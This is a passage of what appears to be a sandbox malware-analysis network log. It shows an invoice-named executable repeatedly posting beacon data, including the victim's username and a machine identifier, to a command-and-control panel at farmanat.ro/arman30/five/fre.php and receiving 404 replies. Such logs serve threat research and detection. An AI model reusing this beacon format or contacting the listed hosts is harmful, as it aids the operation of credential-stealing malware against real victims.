Nov 25, 2021 10:50:24.185755968 CET	6684	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:24.219649076 CET	6684	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:24.289542913 CET	6684	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
264	192.168.11.20	50106	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:24.703006983 CET	6685	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:24.737179041 CET	6685	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:24.981559992 CET	6686	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
265	192.168.11.20	50107	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:25.332854033 CET	6686	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:25.366420031 CET	6686	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:25.665313005 CET	6687	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
266	192.168.11.20	50108	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:26.078077078 CET	6688	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:26.111706972 CET	6688	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:26.376755953 CET	6688	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
267	192.168.11.20	50109	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:26.807857990 CET	6689	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:26.842061043 CET	6689	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:27.173216105 CET	6690	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
268	192.168.11.20	50110	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:27.596260071 CET	6690	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:27.630498886 CET	6690	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:27.975099087 CET	6691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
269	192.168.11.20	50111	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:28.402048111 CET	6692	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:28.436250925 CET	6692	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:28.492588997 CET	6692	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.11.20	49862	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:19.071831942 CET	6342	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:19.105864048 CET	6342	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:19.155915022 CET	6343	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
270	192.168.11.20	50112	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:28.896038055 CET	6693	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:28.930179119 CET	6693	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:28.986506939 CET	6694	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
271	192.168.11.20	50113	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:29.419476032 CET	6694	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:29.452986956 CET	6694	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:29.507684946 CET	6695	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
272	192.168.11.20	50114	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:29.941230059 CET	6696	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:29.975507021 CET	6696	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:30.027120113 CET	6696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
273	192.168.11.20	50115	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:30.460479021 CET	6697	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:30.494013071 CET	6697	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:30.543375015 CET	6697	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
274	192.168.11.20	50116	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:30.962182045 CET	6698	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:30.995687962 CET	6698	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:31.045028925 CET	6699	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
275	192.168.11.20	50117	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:31.469315052 CET	6700	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:31.503714085 CET	6700	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:31.557591915 CET	6700	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
276	192.168.11.20	50118	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:31.996695042 CET	6701	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:32.030255079 CET	6701	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:32.082495928 CET	6701	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
277	192.168.11.20	50119	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:32.501487970 CET	6702	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:32.535531998 CET	6702	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:32.603969097 CET	6703	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
278	192.168.11.20	50120	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:33.031277895 CET	6704	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:33.065408945 CET	6704	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:33.117424011 CET	6704	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
279	192.168.11.20	50121	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:33.541841030 CET	6705	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:33.575417042 CET	6705	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:33.626410961 CET	6705	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.11.20	49863	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:19.719300985 CET	6343	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:19.753021955 CET	6344	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:19.804265976 CET	6344	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
280	192.168.11.20	50122	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:34.090399027 CET	6706	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:34.123938084 CET	6706	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:34.183954000 CET	6707	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
281	192.168.11.20	50123	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:34.608633995 CET	6707	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:34.642211914 CET	6708	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
